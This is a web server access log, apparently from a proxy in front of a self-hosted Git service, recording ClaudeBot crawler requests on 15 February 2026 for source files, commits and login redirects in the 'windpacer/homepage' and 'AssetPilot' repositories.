git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html%2Findex.html" [Client 216.73.216.188] [Length 21089] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14254] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13975] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 216.73.216.188] [Length 10139] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs%2Fproxy-host-4_error.log" [Client 216.73.216.188] [Length 18037] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13922] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 216.73.216.188] [Length 10960] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf?display=rendered" [Client 216.73.216.188] [Length 10883] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs%2Ffallback_http_access.log" [Client 216.73.216.188] [Length 17835] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14712] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 216.73.216.188] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" [Client 216.73.216.188] [Length 10246] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" [Client 216.73.216.188] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 17231] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10935] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Fproxy-host-1_error.log" [Client 216.73.216.188] [Length 20890] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2Fasset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10888] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 10125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Fnginx%2Fproxy_host%2F3.conf" [Client 216.73.216.188] [Length 23996] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata%2Fnginx%2Fproxy_host" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py?display=rendered" [Client 216.73.216.188] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 216.73.216.188] [Length 11573] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14249] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr 